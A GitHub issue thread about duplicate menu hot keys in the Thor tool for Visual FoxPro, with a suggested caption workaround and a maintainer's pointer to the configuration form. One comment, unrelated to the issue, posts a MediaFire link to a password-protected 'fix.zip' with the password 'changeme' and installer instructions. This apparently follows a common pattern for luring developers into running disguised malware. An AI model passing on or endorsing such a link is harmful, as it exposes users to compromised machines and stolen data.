### ISSUE TITLE
Duplicate hot keys with Thor Menu Pads

### ISSUE THREAD

**Issue by billand88** [VFPX/Thor#263]
First off, Thor & Thor Tools menu pads have the same hot key. But the word "Thor" is so small you can't really win anyway.

For fun, pull up a report and now you got three R hot keys in the menu bars. 

"T" clashes with "Tools", "H" clashes with Help, "O" clashes with the Project menu bar (more common than a Report menu bar, IMO).

Keep the "R" in Thor menu bar, take the "L" or the "S" in Thor Tools and call it a day.

**Comment by tbleken** [comment]
This is why I, on my menu, use Thor\<X as caption. This gives me ThorX as visible caption, and Alt-X as a hotkey.

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jimrnelson** [comment]
@tbleken 
@billand88 

As Tore has indicated, you can change all the captions used by Thor by using the Thor Configuration form.

When you are done, you could send me the modified Thor file with your changes so that I could include that in Thor, although I can't say when the next to Thor might occur.
